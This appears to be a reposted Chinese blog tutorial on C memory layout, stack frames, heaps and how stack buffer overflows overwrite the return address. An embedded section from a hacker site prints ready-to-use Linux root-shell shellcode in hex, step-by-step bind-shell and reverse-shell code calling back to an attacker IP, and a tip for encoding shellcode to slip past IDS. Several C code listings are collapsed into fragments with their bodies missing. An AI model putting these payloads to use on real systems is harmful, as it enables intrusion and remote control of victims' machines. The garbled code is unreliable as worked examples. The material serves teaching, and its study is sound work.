触过编程的人都知道,高级语言都能通过变量名来访问内存中的数据。那么这些变量在内存中是如何存放的呢?程序又是如何使用这些变量的呢?下面就会对此进行深入的讨论。下文中的C语言代码如没有特别声明,默认都使用VC编译的release版。
首先,来了解一下 C 语言的变量是如何在内存分部的。C 语言有全局变量(Global)、本地变量(Local),静态变量(Static)、寄存器变量(Regeister)。每种变量都有不同的分配方式。先来看下面这段代码:
| #include <stdio.h> int g1=0, g2=0, g3=0; int main() //打印出各个变量的内存地址 printf("0x%08x/n",&v1); //打印各本地变量的内存地址 |
编译后的执行结果是:
0x0012ff78
0x0012ff7c
0x0012ff80
0x004068d0
0x004068d4
0x004068d8
0x004068dc
0x004068e0
0x004068e4
输出的结果就是变量的内存地址。其中v1,v2,v3是本地变量,g1,g2,g3是全局变量,s1,s2,s3是静态变量。你可以看到这些变量在内存是连续分布的,但是本地变量和全局变量分配的内存地址差了十万八千里,而全局变量和静态变量分配的内存是连续的。这是因为本地变量和全局/静态变量是分配在不同类型的内存区域中的结果。对于一个进程的内存空间而言,可以在逻辑上分成3个部份:代码区,静态数据区和动态数据区。动态数据区一般就是“堆栈”。“栈(stack)”和“堆(heap)”是两种不同的动态数据区,栈是一种线性结构,堆是一种链式结构。进程的每个线程都有私有的“栈”,所以每个线程虽然代码一样,但本地变量的数据都是互不干扰。一个堆栈可以通过“基地址”和“栈顶”地址来描述。全局变量和静态变量分配在静态数据区,本地变量分配在动态数据区,即堆栈中。程序通过堆栈的基地址和偏移量来访问本地变量。
├———————┤低端内存区域
│ …… │
├———————┤
│ 动态数据区 │
├———————┤
│ …… │
├———————┤
│ 代码区 │
├———————┤
│ 静态数据区 │
├———————┤
│ …… │
├———————┤高端内存区域
堆栈是一个先进后出的数据结构,栈顶地址总是小于等于栈的基地址。我们可以先了解一下函数调用的过程,以便对堆栈在程序中的作用有更深入的了解。不同的语言有不同的函数调用规定,这些因素有参数的压入规则和堆栈的平衡。windows API的调用规则和ANSI C的函数调用规则是不一样的,前者由被调函数调整堆栈,后者由调用者调整堆栈。两者通过“__stdcall”和“__cdecl”前缀区分。先看下面这段代码:
| #include <stdio.h> void __stdcall func(int param1,int param2,int param3) int main() |
编译后的执行结果是:
0x0012ff78
0x0012ff7c
0x0012ff80
0x0012ff68
0x0012ff6c
0x0012ff70
├———————┤<—函数执行时的栈顶(ESP)、低端内存区域
│ …… │
├———————┤
│ var 1 │
├———————┤
│ var 2 │
├———————┤
│ var 3 │
├———————┤
│ RET │4个字节
├———————┤<—“__cdecl”函数返回后的栈顶(ESP)
│ parameter 1 │
├———————┤
│ parameter 2 │
├———————┤
│ parameter 3 │
├———————┤<—“__stdcall”函数返回后的栈顶(ESP)
│ …… │
├———————┤<—栈底(基地址 EBP)、高端内存区域
上图就是函数调用过程中堆栈的样子了。首先,三个参数以从又到左的次序压入堆栈,先压“param3”,再压“param2”,最后压入“param1”;然后压入函数的返回地址(RET),接着跳转到函数地址接着执行(这里要补充一点,介绍UNIX下的缓冲溢出原理的文章中都提到在压入RET后,继续压入当前EBP,然后用当前ESP代替EBP。然而,有一篇介绍windows下函数调用的文章中说,在windows下的函数调用也有这一步骤,但根据我的实际调试,并未发现这一步,这还可以从param3和var1之间只有4字节的间隙这点看出来);第三步,将栈顶(ESP)减去一个数,为本地变量分配内存空间,上例中是减去12字节(ESP=ESP-3*4,每个int变量占用4个字节);接着就初始化本地变量的内存空间。由于“__stdcall”调用由被调函数调整堆栈,所以在函数返回前要恢复堆栈,先回收本地变量占用的内存(ESP=ESP+3*4),然后取出返回地址,填入EIP寄存器,回收先前压入参数占用的内存(ESP=ESP+3*4),继续执行调用者的代码。参见下列汇编代码:
;--------------func 函数的汇编代码-------------------
:00401000 83EC0C sub esp, 0000000C //创建本地变量的内存空间
:00401003 8B442410 mov eax, dword ptr [esp+10]
:00401007 8B4C2414 mov ecx, dword ptr [esp+14]
:0040100B 8B542418 mov edx, dword ptr [esp+18]
:0040100F 89442400 mov dword ptr [esp], eax
:00401013 8D442410 lea eax, dword ptr [esp+10]
:00401017 894C2404 mov dword ptr [esp+04], ecx
……………………(省略若干代码)
:00401075 83C43C add esp, 0000003C ;恢复堆栈,回收本地变量的内存空间
:00401078 C3 ret 000C ;函数返回,恢复参数占用的内存空间
;如果是“__cdecl”的话,这里是“ret”,堆栈将由调用者恢复
;-------------------函数结束-------------------------
;--------------主程序调用func函数的代码--------------
:00401080 6A03 push 00000003 //压入参数param3
:00401082 6A02 push 00000002 //压入参数param2
:00401084 6A01 push 00000001 //压入参数param1
:00401086 E875FFFFFF call 00401000 //调用func函数
;如果是“__cdecl”的话,将在这里恢复堆栈,“add esp, 0000000C”
聪明的读者看到这里,差不多就明白缓冲溢出的原理了。先来看下面的代码:
| #include <stdio.h> void __stdcall func() int main() |
编译后执行一下回怎么样?哈,“"0x00414141"指令引用的"0x00000000"内存。该内存不能为"read".”,“非法操作”喽!"41"就是"A"的16进制的ASCII码了,那明显就是strcat这句出的问题了。"lpBuff"的大小只有8字节,算进结尾的/0,那strcat最多只能写入7个"A",但程序实际写入了11个"A"外加1个/0.再来看看上面那幅图,多出来的4个字节正好覆盖了RET的所在的内存空间,导致函数返回到一个错误的内存地址,执行了错误的指令。如果能精心构造这个字符串,使它分成三部分,前一部份仅仅是填充的无意义数据以达到溢出的目的,接着是一个覆盖RET的数据,紧接着是一段shellcode,那只要着个RET地址能指向这段shellcode的第一个指令,那函数返回时就能执行shellcode了。但是软件的不同版本和不同的运行环境都可能影响这段shellcode在内存中的位置,那么要构造这个RET是十分困难的。一般都在RET和shellcode之间填充大量的NOP指令,使得exploit有更强的通用性。
下面里面的是SHELLCODE的一些介绍{{{{对于初期接触网络安全的人来说,Shellcode是很神秘的东西,对于网络攻击过程中的嗅探信息、漏洞剖析都是可以理解的,但真正利用漏洞入侵时,通过把一段二进制码送入后并执行,就可以获得目标机器的控制权,之后的事情是属于爱好者学习技术,还是黑客的行为,就看攻击者的一念之差了。Shellcode就好象神秘的武器,安全防护变得如此不堪一击。Shellcode究竟是什么样的程序?是什么特殊代码?如何才能学会编写?我下面收集了几类常见的Shellcode,主要是学习使用。它其实也是一般的软件程序,主要是因为二进制码的“不可读性”,增加了神秘色彩。
Shellcode是指能完成特殊任务的自包含的二进制代码,根据不同的任务可能是发出一条系统调用或建立一个高权限的Shell,Shellcode也就由此得名。它的最终目的是取得目标机器的控制权,所以一般被攻击者利用系统的漏洞送入系统中执行,从而获取特殊权限的执行环境,或给自己设立有特权的帐户。Shellcode因操作系统有一些差异,这里以Linux为例。
Shellcode是一段高技巧的软件代码,为了小而精,一般直接写为16进制的操作码,当然编写者一般采用C或汇编编写,然后通过汇编程序成为16进制的操作码。
1、获取特殊权限:攻击的目标通常是某个SUID(具有高权限的系统程序)程序,因为它可以具有较高的特权去执行一些命令(比如修口令等),好的SUID程序会在不必要时放弃过高的特权,需要时再重新设置获取特权。Setreuid是用来设置(恢复)进程的真实和有效的用户ID。当然也就可以设置root(0)的权限。
xor ebx,ebx 参数一:真实用户id(ruid)=0
xor ecx,ecx 参数二:有效用户id(euid)=0
xor eax,eax
mov al,0x46 系统调用0x46
int 0x80 设置setreuid(0,0)
有了root(0)用户权限,系统基本就归你指挥了。
2、执行/bin/sh: 有了特权,还要有个“工作室”,shell是Linux常用的控制台,取得一个有特权的shell,就可以让你“随意”工作了。建立一个shell并不复杂,一般采用execve调用执行/bin/sh软件
char *shell[2];
shell[0]=”/bin/sh”;
shell[1]=0;
execve(shell[0],shell,NULL);
该调用C语言编写很简单,对应的汇编代码也不复杂:
xor eax,eax eax=0
push eax eax=null
push 0x68732f2f 压栈 //sh
push 0x6e69622f 压栈 /bin
mov ebx,esp ebx=esp指向/bin/sh
push eax eax=null 结束栈null
push ebx 参数2 ebx指向/bin/sh
mov ecx,esp 参数3 ecx指向[“/bin/sh”,NULL]
xor edx,edx 参数4 edx=NULL
mov al,0xb 参数1 eax=0xb
int 0x80
综合以上两个部分,就是最常见的Shellcode了,具体生成的16进制代码如下(共35个字节):
/x31/xc0/xb0/x46/x31/xdb/x31/xc9/xcd/x80 ;setreuid(0,0)
/x31/xc0/x50/x68/x2f/x2f/x73/x68/x68/x2f/x62/x69/x6e/x89/xe3/x50/x53/x89/xe1
/x31/xd2/xb0/x0b/xcd/x80 ;执行/bin/sh
该代码可以放置在缓冲区内,通过指针函数调用执行。在缓冲区溢出等方式获得执行权利时,运行该段代码就可以打开一个具有root(0)权限的shell界面。
Shellcode在不同的场合,可能有严格的限制,比如在命令行溢出漏洞时,不能太大,没有有效的空间来存放代码,所以要严格精简代码的长度。在SQL注入时对长度的要求更加苛刻,所以很多业界流行的、优秀的Shellcode是经过各种技巧精练的结果。Shellcode是攻击注入代码的统称,并非一定是打开Shell,根据漏洞程序本身的特性有很多的改变,有兴趣的朋友可以从网上收集。
3、绑定到端口的Shellcode
用shellcode在目标计算机上打开一个端口(通讯服务),并将Shell绑定到该端口,攻击者可以放弃入侵时的用的端口,等于在目标机器上建立了系统的后门。该端口可以为入侵者随时建立连接,因为是打开了shell,所以等于建立远程控制目标的控制台。
开启服务离不开Socket,Socket定义为一个端口和一个IP到一个进程的绑定。
a) 建立本地IP Socket,TCP
int server
server=socket(2,1,0)
b) 用IP和端口建立一个Sockaddr_in结构
struct sockaddr_in server_addr
server_addr.sin_addr.s_addr=0 socket的地址设为本地地址
server_addr.sin_port=0xBBBB socket的端口设为0xBBBB=48059
server_addr.sin_family=2 协议族为IP
c) 将端口和IP绑定到Socket上
bind(server, (struct sockaddr *)&server_addr, 0x10)
d) 以监听模式启动socket:打开端口并等待连接
listen(server, 0)
e) 有连接时,向客户返回一个句柄
int client
client=accept(server, 0, 0)
f) 将返回的句柄,复制到stdin、stdout、stderr,shell输出到攻击者(client)的屏幕
dup2(client,0)
dup2(client,1)
dup2(client,2)
g) 调用普通的execve执行shellcode
char *shell[2];
shell[0]=”/bin/sh”
shell[1]=0
execve(shell[0], shell, 0)
4、反向连接的shellcode
当目标计算机在防火墙后时,防火墙不允许外边的计算机主动访问目标机器。所以即使采用上边的shellcode建立了服务后门,你还是不能与目标计算机建立连接。反向连接的含义就是,让目标计算机通过特定的IP(攻击者的)和端口反向连接到攻击者,也可以设定为在固定的时间段主动来建立连接。
很多木马就利用这种方式,主动连接带木马的管理者,“神不知,鬼不觉”地把目标计算机加入到某个“僵尸网络”的黑社会团伙中。
a) 建立本地IP Socket,TCP
int soc
soc=socket(2,1,0)
b) 用IP和端口建立一个Sockaddr_in结构
struct sockaddr_in server_addr
server_addr.sin_addr.s_addr=0x660A0A0A socket的地址设为10.10.10.102
server_addr.sin_port=0xBBBB socket的端口设为0xBBBB=48059
server_addr.sin_family=2 协议族为IP
c) 建立反向连接connect
int remote
remote=connect(soc, (struct sockaddr*)&server_addr, 0x10)
d) 将socket复制到stdin、stdout、stderr,shell输出到攻击者的屏幕
dup2(soc,0)
dup2(soc,1)
dup2(soc,2)
e) 调用普通的execve执行shellcode
char *shell[2];
shell[0]=”/bin/sh”
shell[1]=0
execve(shell[0], shell, 0)
注意:10.10.10.102为防火墙外攻击机器的地址,此时在该机器上要启动一个监听48059端口的服务
5、躲避IDS的过滤
由于经典的Shellcode并不是有很多的版本,大多数人员都是采用同样的Shellcode,很少有人自己编写。所以IDS厂商把常见的Shellcode的指纹提取出来,作为验证攻击行为的“特征”,很多攻击行为就暴露在IDS的监控之下,网络管理人员可以很快知道你到了他的网络内部,进而采取“捕获”措施。
所以,隐藏指纹,变换代码,Shellcode也在不断更新。技术很多,这里就不例举了,提一个有意思的思路:因为Shellcode的基本功能相同,都是诱使目标机器执行这些指令,目标代码在传输和存放时是很容易被IDS或系统察觉的,那么直到被执行前才恢复原来面貌是一个好注意。所以有人通过把代码简单移位,“加密”后的代码没有任何“意义”,到执行前再反向移位,被检测到的概率就小多了,这种方式对躲避IDS是很有效果的。
本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接:http://www.hackbase.com/tech/2009-08-13/54896.html}}}}}}
├———————┤<—低端内存区域
│ …… │
├———————┤<—由exploit填入数据的开始
│ │
│ buffer │<—填入无用的数据
│ │
├———————┤
│ RET │<—指向shellcode,或NOP指令的范围
├———————┤
│ NOP │
│ …… │<—填入的NOP指令,是RET可指向的范围
│ NOP │
├———————┤
│ │
│ shellcode │
│ │
├———————┤<—由exploit填入数据的结束
│ …… │
├———————┤<—高端内存区域
windows下的动态数据除了可存放在栈中,还可以存放在堆中。了解C++的朋友都知道,C++可以使用new关键字来动态分配内存。来看下面的C++代码:
| #include <stdio.h> void func() void main() |
程序执行结果为:
0x004107d0
0x0012ff04
0x004068c0
可以发现用new关键字分配的内存即不在栈中,也不在静态数据区。VC编译器是通过windows下的“堆(heap)”来实现new关键字的内存动态分配。在讲“堆”之前,先来了解一下和“堆”有关的几个API函数:
HeapAlloc 在堆中申请内存空间
HeapCreate 创建一个新的堆对象
HeapDestroy 销毁一个堆对象
HeapFree 释放申请的内存
HeapWalk 枚举堆对象的所有内存块
GetProcessHeap 取得进程的默认堆对象
GetProcessHeaps 取得进程所有的堆对象
LocalAlloc
GlobalAlloc
当进程初始化时,系统会自动为进程创建一个默认堆,这个堆默认所占内存的大小为1M.堆对象由系统进行管理,它在内存中以链式结构存在。通过下面的代码可以通过堆动态申请内存空间:
HANDLE hHeap=GetProcessHeap();
char *buff=HeapAlloc(hHeap,0,8);
其中hHeap是堆对象的句柄,buff是指向申请的内存空间的地址。那这个hHeap究竟是什么呢?它的值有什么意义吗?看看下面这段代码吧:
| #pragma comment(linker,"/entry:main") //定义程序的入口 _CRTIMP int (__cdecl *printf)(const char *, ...); //定义STL函数printf |
执行结果为:
0x00130000
0x00133100
0x00133118
hHeap的值怎么和那个buff的值那么接近呢?其实hHeap这个句柄就是指向HEAP首部的地址。在进程的用户区存着一个叫PEB(进程环境块)的结构,这个结构中存放着一些有关进程的重要信息,其中在PEB首地址偏移0x18处存放的ProcessHeap就是进程默认堆的地址,而偏移0x90处存放了指向进程所有堆的地址列表的指针。windows有很多API都使用进程的默认堆来存放动态数据,如windows 2000下的所有ANSI版本的函数都是在默认堆中申请内存来转换ANSI字符串到Unicode字符串的。对一个堆的访问是顺序进行的,同一时刻只能有一个线程访问堆中的数据,当多个线程同时有访问要求时,只能排队等待,这样便造成程序执行效率下降。
最后来说说内存中的数据对齐。所位数据对齐,是指数据所在的内存地址必须是该数据长度的整数倍,DWORD数据的内存起始地址能被4除尽,WORD数据的内存起始地址能被2除尽,x86 CPU能直接访问对齐的数据,当他试图访问一个未对齐的数据时,会在内部进行一系列的调整,这些调整对于程序来说是透明的,但是会降低运行速度,所以编译器在编译程序时会尽量保证数据对齐。同样一段代码,我们来看看用VC、Dev-C++和lcc三个不同编译器编译出来的程序的执行结果:
| #include <stdio.h> int main() |
这是用VC编译后的执行结果:
0x0012ff7c
0x0012ff7b
0x0012ff80
变量在内存中的顺序:b(1字节)-a(4字节)-c(4字节)。
这是用Dev-C++编译后的执行结果:
0x0022ff7c
0x0022ff7b
0x0022ff74变量在内存中的顺序:c(4字节)-中间相隔3字节-b(占1字节)-a(4字节)。
这是用lcc编译后的执行结果:
0x0012ff6c
0x0012ff6b
0x0012ff64
变量在内存中的顺序:同上。
三个编译器都做到了数据对齐,但是后两个编译器显然没VC“聪明”,让一个char占了4字节,浪费内存哦。
基础知识:
堆栈是一种简单的数据结构,是一种只允许在其一端进行插入或删除的线性表。允许插入或删除操作的一端称为栈顶,另一端称为栈底,对堆栈的插入和删除操作被称为入栈和出栈。有一组CPU指令可以实现对进程的内存实现堆栈访问。其中,POP指令实现出栈操作,PUSH指令实现入栈操作。CPU的ESP寄存器存放当前线程的栈顶指针,EBP寄存器中保存当前线程的栈底指针。CPU的EIP寄存器存放下一个CPU指令存放的内存地址,当CPU执行完当前的指令后,从EIP寄存器中读取下一条指令的内存地址,然后继续执行
760
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
